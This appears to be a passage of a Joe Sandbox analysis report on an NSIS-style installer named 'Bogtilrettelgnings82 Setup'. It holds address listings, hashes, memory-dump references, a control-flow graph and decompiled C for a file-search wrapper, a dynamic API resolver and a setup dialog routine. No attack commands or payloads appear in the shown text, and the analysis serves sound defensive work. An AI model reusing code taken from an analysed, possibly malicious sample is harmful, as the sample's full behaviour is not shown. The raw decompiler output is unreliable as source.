                                                            0x00000000
                                                            0x00406b34
                                                            0x00406a02
                                                            0x00406a05
                                                            0x00406a08
                                                            0x00406a0c
                                                            0x00406a0f
                                                            0x00406a15
                                                            0x00406a17
                                                            0x00406a17
                                                            0x00406a17
                                                            0x00406a1a
                                                            0x00406a1d
                                                            0x00406a1d
                                                            0x00406a1d
                                                            0x00406a1d
                                                            0x00406a20
                                                            0x00406a20
                                                            0x00406a24
                                                            0x00406a84
                                                            0x00406a87
                                                            0x00406a8c
                                                            0x00406a8d
                                                            0x00406a8f
                                                            0x00406a91
                                                            0x00406a94
                                                            0x00000000
                                                            0x00406a94
                                                            0x00406a26
                                                            0x00406a2c
                                                            0x00406a2f
                                                            0x00406a32
                                                            0x00406a35
                                                            0x00406a38
                                                            0x00406a3b
                                                            0x00406a3e
                                                            0x00406a41
                                                            0x00406a44
                                                            0x00406a47
                                                            0x00406a60
                                                            0x00406a63
                                                            0x00406a66
                                                            0x00406a69
                                                            0x00406a6d
                                                            0x00406a6f
                                                            0x00406a6f
                                                            0x00406a70
                                                            0x00406a73
                                                            0x00406a49
                                                            0x00406a49
                                                            0x00406a51
                                                            0x00406a56
                                                            0x00406a58
                                                            0x00406a5b
                                                            0x00406a5b
                                                            0x00406a76
                                                            0x00406a7d
                                                            0x00000000
                                                            0x00406a7f
                                                            0x00000000
                                                            0x00406a7f
                                                            0x00000000
                                                            0x0040671b
                                                            0x0040671e
                                                            0x00406754
                                                            0x00406884
                                                            0x00406884
                                                            0x00406884
                                                            0x00406884
                                                            0x00406887
                                                            0x00406887
                                                            0x0040688a
                                                            0x0040688c
                                                            0x00406b16
                                                            0x00000000
                                                            0x00406b16
                                                            0x00406892
                                                            0x00406895
                                                            0x00000000
                                                            0x00000000
                                                            0x0040689b
                                                            0x0040689f
                                                            0x004068a2
                                                            0x004068a2
                                                            0x004068a2
                                                            0x00000000
                                                            0x004068a2
                                                            0x00406720
                                                            0x00406722
                                                            0x00406724
                                                            0x00406726
                                                            0x00406729
                                                            0x0040672a
                                                            0x0040672c
                                                            0x0040672e
                                                            0x00406731
                                                            0x00406734
                                                            0x0040674a
                                                            0x0040674f
                                                            0x00406787
                                                            0x00406787
                                                            0x0040678b
                                                            0x004067b7
                                                            0x004067b9
                                                            0x004067c0
                                                            0x004067c3
                                                            0x004067c6
                                                            0x004067c6
                                                            0x004067cb
                                                            0x004067cb
                                                            0x004067cd
                                                            0x004067d0
                                                            0x004067d7
                                                            0x004067da
                                                            0x00406807
                                                            0x00406807
                                                            0x0040680a
                                                            0x0040680d
                                                            0x00406881
                                                            0x00406881
                                                            0x00406881
                                                            0x00000000
                                                            0x00406881
                                                            0x0040680f
                                                            0x00406815
                                                            0x00406818
                                                            0x0040681b
                                                            0x0040681e
                                                            0x00406821
                                                            0x00406824
                                                            0x00406827
                                                            0x0040682a
                                                            0x0040682d
                                                            0x00406830
                                                            0x00406849
                                                            0x0040684b
                                                            0x0040684e
                                                            0x0040684f
                                                            0x00406852
                                                            0x00406854
                                                            0x00406857
                                                            0x00406859
                                                            0x0040685b
                                                            0x0040685e
                                                            0x00406860
                                                            0x00406863
                                                            0x00406867
                                                            0x00406869
                                                            0x00406869
                                                            0x0040686a
                                                            0x0040686d
                                                            0x00406870
                                                            0x00406832
                                                            0x00406832
                                                            0x0040683a
                                                            0x0040683f
                                                            0x00406841
                                                            0x00406844
                                                            0x00406844
                                                            0x00406873
                                                            0x0040687a
                                                            0x00406804
                                                            0x00406804
                                                            0x00406804
                                                            0x00406804
                                                            0x00000000
                                                            0x0040687c
                                                            0x00000000
                                                            0x0040687c
                                                            0x0040687a
                                                            0x0040678d
                                                            0x00406790
                                                            0x00406792
                                                            0x00406795
                                                            0x00406798
                                                            0x0040679b
                                                            0x0040679d
                                                            0x004067a0
                                                            0x004067a3
                                                            0x004067a3
                                                            0x004067a6
                                                            0x004067a6
                                                            0x004067a9
                                                            0x004067b0
                                                            0x00406784
                                                            0x00406784
                                                            0x00406784
                                                            0x00406784
                                                            0x00000000
                                                            0x004067b2
                                                            0x00000000
                                                            0x004067b2
                                                            0x004067b0
                                                            0x00406736
                                                            0x00406739
                                                            0x0040673b
                                                            0x0040673e
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00406628
                                                            0x00406628
                                                            0x0040662c
                                                            0x00406af2
                                                            0x00000000
                                                            0x00406af2
                                                            0x00406632
                                                            0x00406635
                                                            0x00406638
                                                            0x0040663b
                                                            0x0040663d
                                                            0x0040663d
                                                            0x0040663d
                                                            0x00406640
                                                            0x00406643
                                                            0x00406646
                                                            0x00406649
                                                            0x0040664c
                                                            0x0040664f
                                                            0x00406650
                                                            0x00406652
                                                            0x00406652
                                                            0x00406652
                                                            0x00406655
                                                            0x00406658
                                                            0x0040665b
                                                            0x0040665e
                                                            0x0040665e
                                                            0x0040665e
                                                            0x00406661
                                                            0x00000000
                                                            0x00000000
                                                            0x004068a5
                                                            0x004068a5
                                                            0x004068a5
                                                            0x004068a9
                                                            0x00000000
                                                            0x00000000
                                                            0x004068af
                                                            0x004068b2
                                                            0x004068b5
                                                            0x004068b8
                                                            0x004068ba
                                                            0x004068ba
                                                            0x004068ba
                                                            0x004068bd
                                                            0x004068c0
                                                            0x004068c3
                                                            0x004068c6
                                                            0x004068c9
                                                            0x004068cc
                                                            0x004068cd
                                                            0x004068cf
                                                            0x004068cf
                                                            0x004068cf
                                                            0x004068d2
                                                            0x004068d5
                                                            0x004068d8
                                                            0x004068db
                                                            0x004068de
                                                            0x004068e2
                                                            0x004068e4
                                                            0x004068e7
                                                            0x00000000
                                                            0x004068e9
                                                            0x00000000
                                                            0x004068e9
                                                            0x004068e7
                                                            0x00406b1c
                                                            0x00000000
                                                            0x00000000
                                                            0x0040614b

                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.5770307662.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.5770278875.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770363207.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770672204.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770672204.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_zp.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ec72fc132c466b913675dee2fa2b2b567fe445eb5db00bf473192c6c9f577d16
                                                            • Instruction ID: 6e58a974b7539627981ffc7c5b29088a4c4f0515112d774f0dd61bb038518bac
                                                            • Opcode Fuzzy Hash: ec72fc132c466b913675dee2fa2b2b567fe445eb5db00bf473192c6c9f577d16
                                                            • Instruction Fuzzy Hash: 8DF17770D00229CBCF28CFA8C8946ADBBB1FF45305F25856ED856BB281D7785A96CF44
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E00405FE2(CHAR* _a4) {
                                                            				void* _t2;
                                                            
                                                            				_t2 = FindFirstFileA(_a4, 0x421530); // executed
                                                            				if(_t2 == 0xffffffff) {
                                                            					return 0;
                                                            				}
                                                            				FindClose(_t2);
                                                            				return 0x421530;
                                                            			}




                                                            0x00405fed
                                                            0x00405ff6
                                                            0x00000000
                                                            0x00406003
                                                            0x00405ff9
                                                            0x00000000

                                                            APIs
                                                            • FindFirstFileA.KERNELBASE(?,00421530,C:\Users\user\AppData\Local\Temp\nsq8C22.tmp,0040589F,C:\Users\user\AppData\Local\Temp\nsq8C22.tmp,C:\Users\user\AppData\Local\Temp\nsq8C22.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsq8C22.tmp,C:\Users\user\AppData\Local\Temp\nsq8C22.tmp,?,?,776C2EE0,004055BE,?,C:\Users\user\AppData\Local\Temp\,776C2EE0), ref: 00405FED
                                                            • FindClose.KERNEL32(00000000), ref: 00405FF9
                                                            Strings
                                                            • C:\Users\user\AppData\Local\Temp\nsq8C22.tmp, xrefs: 00405FE2
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.5770307662.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.5770278875.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770363207.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770672204.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770672204.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_zp.jbxd
                                                            Similarity
                                                            • API ID: Find$CloseFileFirst
                                                            • String ID: C:\Users\user\AppData\Local\Temp\nsq8C22.tmp
                                                            • API String ID: 2295610775-746621221
                                                            • Opcode ID: 20260570c2d7e465130872416de93bc7e309ed693e48b052a27977fc02f21dff
                                                            • Instruction ID: 3600370175755c1184b2d23a4f6bb82519631065e8d036e0b8342efe42824015
                                                            • Opcode Fuzzy Hash: 20260570c2d7e465130872416de93bc7e309ed693e48b052a27977fc02f21dff
                                                            • Instruction Fuzzy Hash: EBD0123295D1306BD3115778BD0C84BBA589F55334B528A73B466F22F0D7349C6286EE
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E00406009(signed int _a4) {
                                                            				struct HINSTANCE__* _t5;
                                                            				CHAR* _t7;
                                                            				signed int _t9;
                                                            
                                                            				_t9 = _a4 << 3;
                                                            				_t7 =  *(_t9 + 0x409250);
                                                            				_t5 = GetModuleHandleA(_t7);
                                                            				if(_t5 != 0) {
                                                            					L2:
                                                            					return GetProcAddress(_t5,  *(_t9 + 0x409254));
                                                            				}
                                                            				_t5 = LoadLibraryA(_t7); // executed
                                                            				if(_t5 != 0) {
                                                            					goto L2;
                                                            				}
                                                            				return _t5;
                                                            			}






                                                            0x00406011
                                                            0x00406014
                                                            0x0040601b
                                                            0x00406023
                                                            0x00406030
                                                            0x00000000
                                                            0x00406037
                                                            0x00406026
                                                            0x0040602e
                                                            0x00000000
                                                            0x00000000
                                                            0x0040603f

                                                            APIs
                                                            • GetModuleHandleA.KERNEL32(?,?,?,0040325C,00000008), ref: 0040601B
                                                            • LoadLibraryA.KERNELBASE(?,?,?,0040325C,00000008), ref: 00406026
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00406037
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.5770307662.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.5770278875.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770363207.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770672204.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770672204.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_zp.jbxd
                                                            Similarity
                                                            • API ID: AddressHandleLibraryLoadModuleProc
                                                            • String ID:
                                                            • API String ID: 310444273-0
                                                            • Opcode ID: 14778026069da28af87b9950d589da7dca929d2a00fc8d83b3a738ce3464f0c4
                                                            • Instruction ID: 3e3a2605e63591ce59f726a843aae7ace037ed194313f5fe4a7956cb36b79068
                                                            • Opcode Fuzzy Hash: 14778026069da28af87b9950d589da7dca929d2a00fc8d83b3a738ce3464f0c4
                                                            • Instruction Fuzzy Hash: 4AE0CD3290412167C3109B749D44E3773ACAFD4751305483DF506F2150D734AC11E7AD
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 164 403af9-403b0b 165 403b11-403b17 164->165 166 403c4c-403c5b 164->166 165->166 167 403b1d-403b26 165->167 168 403caa-403cbf 166->168 169 403c5d-403ca5 GetDlgItem * 2 call 403fcc SetClassLongA call 40140b 166->169 172 403b28-403b35 SetWindowPos 167->172 173 403b3b-403b3e 167->173 170 403cc1-403cc4 168->170 171 403cff-403d04 call 404018 168->171 169->168 175 403cc6-403cd1 call 401389 170->175 176 403cf7-403cf9 170->176 183 403d09-403d24 171->183 172->173 178 403b40-403b52 ShowWindow 173->178 179 403b58-403b5e 173->179 175->176 197 403cd3-403cf2 SendMessageA 175->197 176->171 182 403f99 176->182 178->179 184 403b60-403b75 DestroyWindow 179->184 185 403b7a-403b7d 179->185 192 403f9b-403fa2 182->192 190 403d26-403d28 call 40140b 183->190 191 403d2d-403d33 183->191 193 403f76-403f7c 184->193 187 403b90-403b96 185->187 188 403b7f-403b8b SetWindowLongA 185->188 195 403c39-403c47 call 404033 187->195 196 403b9c-403bad GetDlgItem 187->196 188->192 190->191 200 403f57-403f70 DestroyWindow EndDialog 191->200 201 403d39-403d44 191->201 193->182 198 403f7e-403f84 193->198 195->192 202 403bcc-403bcf 196->202 203 403baf-403bc6 SendMessageA IsWindowEnabled 196->203 197->192 198->182 205 403f86-403f8f ShowWindow 198->205 200->193 201->200 206 403d4a-403d97 call 405d00 call 403fcc * 3 GetDlgItem 201->206 207 403bd1-403bd2 202->207 208 403bd4-403bd7 202->208 203->182 203->202 205->182 234 403da1-403ddd ShowWindow KiUserCallbackDispatcher call 403fee EnableWindow 206->234 235 403d99-403d9e 206->235 212 403c02-403c07 call 403fa5 207->212 213 403be5-403bea 208->213 214 403bd9-403bdf 208->214 212->195 217 403c20-403c33 SendMessageA 213->217 219 403bec-403bf2 213->219 214->217 218 403be1-403be3 214->218 217->195 218->212 222 403bf4-403bfa call 40140b 219->222 223 403c09-403c12 call 40140b 219->223 232 403c00 222->232 223->195 231 403c14-403c1e 223->231 231->232 232->212 238 403de2 234->238 239 403ddf-403de0 234->239 235->234 240 403de4-403e12 GetSystemMenu EnableMenuItem SendMessageA 238->240 239->240 241 403e14-403e25 SendMessageA 240->241 242 403e27 240->242 243 403e2d-403e66 call 404001 call 405cde lstrlenA call 405d00 SetWindowTextA call 401389 241->243 242->243 243->183 252 403e6c-403e6e 243->252 252->183 253 403e74-403e78 252->253 254 403e97-403eab DestroyWindow 253->254 255 403e7a-403e80 253->255 254->193 257 403eb1-403ede CreateDialogParamA 254->257 255->182 256 403e86-403e8c 255->256 256->183 259 403e92 256->259 257->193 258 403ee4-403f3b call 403fcc GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 257->258 258->182 264 403f3d-403f50 ShowWindow call 404018 258->264 259->182 266 403f55 264->266 266->193
                                                            C-Code - Quality: 84%
                                                            			E00403AF9(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
                                                            				struct HWND__* _v32;
                                                            				void* _v84;
                                                            				void* _v88;
                                                            				void* __ebx;
                                                            				void* __edi;
                                                            				void* __esi;
                                                            				signed int _t35;
                                                            				signed int _t37;
                                                            				signed int _t39;
                                                            				struct HWND__* _t49;
                                                            				signed int _t67;
                                                            				struct HWND__* _t73;
                                                            				signed int _t86;
                                                            				struct HWND__* _t91;
                                                            				signed int _t99;
                                                            				int _t103;
                                                            				signed int _t115;
                                                            				signed int _t116;
                                                            				int _t117;
                                                            				signed int _t122;
                                                            				struct HWND__* _t125;
                                                            				struct HWND__* _t126;
                                                            				int _t127;
                                                            				long _t130;
                                                            				int _t132;
                                                            				int _t133;
                                                            				void* _t134;
                                                            				void* _t142;
                                                            
                                                            				_t115 = _a8;
                                                            				if(_t115 == 0x110 || _t115 == 0x408) {
                                                            					_t35 = _a12;
                                                            					_t125 = _a4;
                                                            					__eflags = _t115 - 0x110;
                                                            					 *0x41fcc8 = _t35;
                                                            					if(_t115 == 0x110) {
                                                            						 *0x4236e8 = _t125;
                                                            						 *0x41fcdc = GetDlgItem(_t125, 1);
                                                            						_t91 = GetDlgItem(_t125, 2);
                                                            						_push(0xffffffff);
                                                            						_push(0x1c);
                                                            						 *0x41eca8 = _t91;
                                                            						E00403FCC(_t125);
                                                            						SetClassLongA(_t125, 0xfffffff2,  *0x422ec8);
                                                            						 *0x422eac = E0040140B(4);
                                                            						_t35 = 1;
                                                            						__eflags = 1;
                                                            						 *0x41fcc8 = 1;
                                                            					}
                                                            					_t122 =  *0x4091f0; // 0x0
                                                            					_t133 = 0;
                                                            					_t130 = (_t122 << 6) +  *0x423700;
                                                            					__eflags = _t122;
                                                            					if(_t122 < 0) {
                                                            						L34:
                                                            						E00404018(0x40b);
                                                            						while(1) {
                                                            							_t37 =  *0x41fcc8; // 0x1
                                                            							 *0x4091f0 =  *0x4091f0 + _t37;
                                                            							_t130 = _t130 + (_t37 << 6);
                                                            							_t39 =  *0x4091f0; // 0x0
                                                            							__eflags = _t39 -  *0x423704;
                                                            							if(_t39 ==  *0x423704) {
                                                            								E0040140B(1);
                                                            							}
                                                            							__eflags =  *0x422eac - _t133; // 0x0
                                                            							if(__eflags != 0) {
                                                            								break;
                                                            							}
                                                            							__eflags =  *0x4091f0 -  *0x423704; // 0x0
                                                            							if(__eflags >= 0) {
                                                            								break;
                                                            							}
                                                            							_t116 =  *(_t130 + 0x14);
                                                            							E00405D00(_t116, _t125, _t130, 0x42b800,  *((intOrPtr*)(_t130 + 0x24)));
                                                            							_push( *((intOrPtr*)(_t130 + 0x20)));
                                                            							_push(0xfffffc19);
                                                            							E00403FCC(_t125);
                                                            							_push( *((intOrPtr*)(_t130 + 0x1c)));
                                                            							_push(0xfffffc1b);
                                                            							E00403FCC(_t125);
                                                            							_push( *((intOrPtr*)(_t130 + 0x28)));
                                                            							_push(0xfffffc1a);
                                                            							E00403FCC(_t125);
                                                            							_t49 = GetDlgItem(_t125, 3);
                                                            							__eflags =  *0x42376c - _t133;
                                                            							_v32 = _t49;
                                                            							if( *0x42376c != _t133) {
                                                            								_t116 = _t116 & 0x0000fefd | 0x00000004;
                                                            								__eflags = _t116;
                                                            							}
                                                            							ShowWindow(_t49, _t116 & 0x00000008); // executed
                                                            							EnableWindow( *(_t134 + 0x30), _t116 & 0x00000100); // executed
                                                            							E00403FEE(_t116 & 0x00000002);
                                                            							_t117 = _t116 & 0x00000004;
                                                            							EnableWindow( *0x41eca8, _t117);
                                                            							__eflags = _t117 - _t133;
                                                            							if(_t117 == _t133) {
                                                            								_push(1);
                                                            							} else {
                                                            								_push(_t133);
                                                            							}
                                                            							EnableMenuItem(GetSystemMenu(_t125, _t133), 0xf060, ??);
                                                            							SendMessageA( *(_t134 + 0x38), 0xf4, _t133, 1);
                                                            							__eflags =  *0x42376c - _t133;
                                                            							if( *0x42376c == _t133) {
                                                            								_push( *0x41fcdc);
                                                            							} else {
                                                            								SendMessageA(_t125, 0x401, 2, _t133);
                                                            								_push( *0x41eca8);
                                                            							}
                                                            							E00404001();
                                                            							E00405CDE(0x41fce0, "Bogtilrettelgnings82 Setup");
                                                            							E00405D00(0x41fce0, _t125, _t130,  &(0x41fce0[lstrlenA(0x41fce0)]),  *((intOrPtr*)(_t130 + 0x18)));
                                                            							SetWindowTextA(_t125, 0x41fce0); // executed
                                                            							_push(_t133);
                                                            							_t67 = E00401389( *((intOrPtr*)(_t130 + 8)));
                                                            							__eflags = _t67;
                                                            							if(_t67 != 0) {
                                                            								continue;
                                                            							} else {
                                                            								__eflags =  *_t130 - _t133;
                                                            								if( *_t130 == _t133) {
                                                            									continue;
                                                            								}
                                                            								__eflags =  *(_t130 + 4) - 5;
                                                            								if( *(_t130 + 4) != 5) {
                                                            									DestroyWindow( *0x422eb8); // executed
                                                            									 *0x41f4b8 = _t130;
                                                            									__eflags =  *_t130 - _t133;
                                                            									if( *_t130 <= _t133) {
                                                            										goto L58;
                                                            									}
                                                            									_t73 = CreateDialogParamA( *0x4236e0,  *_t130 +  *0x422ec0 & 0x0000ffff, _t125,  *(0x4091f4 +  *(_t130 + 4) * 4), _t130); // executed
                                                            									__eflags = _t73 - _t133;
                                                            									 *0x422eb8 = _t73;
                                                            									if(_t73 == _t133) {
                                                            										goto L58;
                                                            									}
                                                            									_push( *((intOrPtr*)(_t130 + 0x2c)));
                                                            									_push(6);
                                                            									E00403FCC(_t73);
                                                            									GetWindowRect(GetDlgItem(_t125, 0x3fa), _t134 + 0x10);
                                                            									ScreenToClient(_t125, _t134 + 0x10);
                                                            									SetWindowPos( *0x422eb8, _t133,  *(_t134 + 0x20),  *(_t134 + 0x20), _t133, _t133, 0x15);
                                                            									_push(_t133);
                                                            									E00401389( *((intOrPtr*)(_t130 + 0xc)));
                                                            									__eflags =  *0x422eac - _t133; // 0x0
                                                            									if(__eflags != 0) {
                                                            										goto L61;
                                                            									}
                                                            									ShowWindow( *0x422eb8, 8); // executed
                                                            									E00404018(0x405);
                                                            									goto L58;
                                                            								}
                                                            								__eflags =  *0x42376c - _t133;
                                                            								if( *0x42376c != _t133) {
                                                            									goto L61;
                                                            								}
                                                            								__eflags =  *0x423760 - _t133;
                                                            								if( *0x423760 != _t133) {
                                                            									continue;
                                                            								}
                                                            								goto L61;
                                                            							}
                                                            						}
                                                            						DestroyWindow( *0x422eb8);
                                                            						 *0x4236e8 = _t133;
                                                            						EndDialog(_t125,  *0x41f0b0);
                                                            						goto L58;
                                                            					} else {
                                                            						__eflags = _t35 - 1;
                                                            						if(_t35 != 1) {
                                                            							L33:
                                                            							__eflags =  *_t130 - _t133;
                                                            							if( *_t130 == _t133) {
                                                            								goto L61;
                                                            							}
                                                            							goto L34;
                                                            						}
                                                            						_push(0);
                                                            						_t86 = E00401389( *((intOrPtr*)(_t130 + 0x10)));
                                                            						__eflags = _t86;
                                                            						if(_t86 == 0) {
                                                            							goto L33;
                                                            						}
                                                            						SendMessageA( *0x422eb8, 0x40f, 0, 1);
                                                            						__eflags =  *0x422eac - _t133; // 0x0
                                                            						return 0 | __eflags == 0x00000000;
                                                            					}
                                                            				} else {
                                                            					_t125 = _a4;
                                                            					_t133 = 0;
                                                            					if(_t115 == 0x47) {
                                                            						SetWindowPos( *0x41fcc0, _t125, 0, 0, 0, 0, 0x13);
                                                            					}
                                                            					if(_t115 == 5) {
                                                            						asm("sbb eax, eax");
                                                            						ShowWindow( *0x41fcc0,  ~(_a12 - 1) & _t115);
                                                            					}
                                                            					if(_t115 != 0x40d) {
                                                            						__eflags = _t115 - 0x11;
                                                            						if(_t115 != 0x11) {
                                                            							__eflags = _t115 - 0x111;
                                                            							if(_t115 != 0x111) {
                                                            								L26:
                                                            								return E00404033(_t115, _a12, _a16);
                                                            							}
                                                            							_t132 = _a12 & 0x0000ffff;
                                                            							_t126 = GetDlgItem(_t125, _t132);
                                                            							__eflags = _t126 - _t133;
                                                            							if(_t126 == _t133) {
                                                            								L13:
                                                            								__eflags = _t132 - 1;
                                                            								if(_t132 != 1) {
                                                            									__eflags = _t132 - 3;
                                                            									if(_t132 != 3) {
                                                            										_t127 = 2;
                                                            										__eflags = _t132 - _t127;
                                                            										if(_t132 != _t127) {
                                                            											L25:
                                                            											SendMessageA( *0x422eb8, 0x111, _a12, _a16);
                                                            											goto L26;
                                                            										}
                                                            										__eflags =  *0x42376c - _t133;
                                                            										if( *0x42376c == _t133) {
                                                            											_t99 = E0040140B(3);
                                                            											__eflags = _t99;
                                                            											if(_t99 != 0) {
                                                            												goto L26;
                                                            											}
                                                            											 *0x41f0b0 = 1;
                                                            											L21:
                                                            											_push(0x78);
                                                            											L22:
                                                            											E00403FA5();
                                                            											goto L26;
                                                            										}
                                                            										E0040140B(_t127);
                                                            										 *0x41f0b0 = _t127;
                                                            										goto L21;
                                                            									}
                                                            									__eflags =  *0x4091f0 - _t133; // 0x0
                                                            									if(__eflags <= 0) {
                                                            										goto L25;
                                                            									}
                                                            									_push(0xffffffff);
                                                            									goto L22;
                                                            								}
                                                            								_push(_t132);
                                                            								goto L22;
                                                            							}
                                                            							SendMessageA(_t126, 0xf3, _t133, _t133);
                                                            							_t103 = IsWindowEnabled(_t126);
                                                            							__eflags = _t103;
                                                            							if(_t103 == 0) {
                                                            								goto L61;
                                                            							}
                                                            							goto L13;
                                                            						}
                                                            						SetWindowLongA(_t125, _t133, _t133);
                                                            						return 1;
                                                            					} else {
                                                            						DestroyWindow( *0x422eb8);
                                                            						 *0x422eb8 = _a12;
                                                            						L58:
                                                            						if( *0x420ce0 == _t133) {
                                                            							_t142 =  *0x422eb8 - _t133; // 0x103ca
                                                            							if(_t142 != 0) {
                                                            								ShowWindow(_t125, 0xa); // executed
                                                            								 *0x420ce0 = 1;
                                                            							}
                                                            						}
                                                            						L61:
                                                            						return 0;
                                                            					}
                                                            				}
                                                            			}































                                                            0x00403b02
                                                            0x00403b0b
                                                            0x00403c4c
                                                            0x00403c50
                                                            0x00403c54
                                                            0x00403c56
                                                            0x00403c5b
                                                            0x00403c66
                                                            0x00403c71
                                                            0x00403c76
                                                            0x00403c78
                                                            0x00403c7a
                                                            0x00403c7d
                                                            0x00403c82
                                                            0x00403c90
                                                            0x00403c9d
                                                            0x00403ca4
                                                            0x00403ca4
                                                            0x00403ca5
                                                            0x00403ca5
                                                            0x00403caa
                                                            0x00403cb0
                                                            0x00403cb7
                                                            0x00403cbd
                                                            0x00403cbf
                                                            0x00403cff
                                                            0x00403d04
                                                            0x00403d09
                                                            0x00403d09
                                                            0x00403d0e
                                                            0x00403d17
                                                            0x00403d19
                                                            0x00403d1e
                                                            0x00403d24
                                                            0x00403d28
                                                            0x00403d28
                                                            0x00403d2d
                                                            0x00403d33
                                                            0x00000000
                                                            0x00000000
                                                            0x00403d3e
                                                            0x00403d44
                                                            0x00000000
                                                            0x00000000
                                                            0x00403d4d
                                                            0x00403d55
                                                            0x00403d5a
                                                            0x00403d5d
                                                            0x00403d63
                                                            0x00403d68
                                                            0x00403d6b
                                                            0x00403d71
                                                            0x00403d76
                                                            0x00403d79
                                                            0x00403d7f
                                                            0x00403d87
                                                            0x00403d8d
                                                            0x00403d93
                                                            0x00403d97
                                                            0x00403d9e
                                                            0x00403d9e
                                                            0x00403d9e
                                                            0x00403da8
                                                            0x00403dba
                                                            0x00403dc6
                                                            0x00403dcb
                                                            0x00403dd5
                                                            0x00403ddb
                                                            0x00403ddd
                                                            0x00403de2
                                                            0x00403ddf
                                                            0x00403ddf
                                                            0x00403ddf
                                                            0x00403df2
                                                            0x00403e0a
                                                            0x00403e0c
                                                            0x00403e12
                                                            0x00403e27
                                                            0x00403e14
                                                            0x00403e1d
                                                            0x00403e1f
                                                            0x00403e1f
                                                            0x00403e2d
                                                            0x00403e3d
                                                            0x00403e4e
                                                            0x00403e55
                                                            0x00403e5b
                                                            0x00403e5f
                                                            0x00403e64
                                                            0x00403e66
                                                            0x00000000
                                                            0x00403e6c
                                                            0x00403e6c
                                                            0x00403e6e
                                                            0x00000000
                                                            0x00000000
                                                            0x00403e74
                                                            0x00403e78
                                                            0x00403e9d
                                                            0x00403ea3
                                                            0x00403ea9
                                                            0x00403eab
                                                            0x00000000
                                                            0x00000000
                                                            0x00403ed1
                                                            0x00403ed7
                                                            0x00403ed9
                                                            0x00403ede
                                                            0x00000000
                                                            0x00000000
                                                            0x00403ee4
                                                            0x00403ee7
                                                            0x00403eea
                                                            0x00403f01
                                                            0x00403f0d
                                                            0x00403f26
                                                            0x00403f2c
                                                            0x00403f30
                                                            0x00403f35
                                                            0x00403f3b
                                                            0x00000000
                                                            0x00000000
                                                            0x00403f45
                                                            0x00403f50
                                                            0x00000000
                                                            0x00403f50
                                                            0x00403e7a
                                                            0x00403e80
                                                            0x00000000
                                                            0x00000000
                                                            0x00403e86
                                                            0x00403e8c
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00403e92
                                                            0x00403e66
                                                            0x00403f5d
                                                            0x00403f69
                                                            0x00403f70
                                                            0x00000000
                                                            0x00403cc1
                                                            0x00403cc1
                                                            0x00403cc4
                                                            0x00403cf7
                                                            0x00403cf7
                                                            0x00403cf9
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00403cf9
                                                            0x00403cc6
                                                            0x00403cca
                                                            0x00403ccf
                                                            0x00403cd1
                                                            0x00000000
                                                            0x00000000
                                                            0x00403ce1
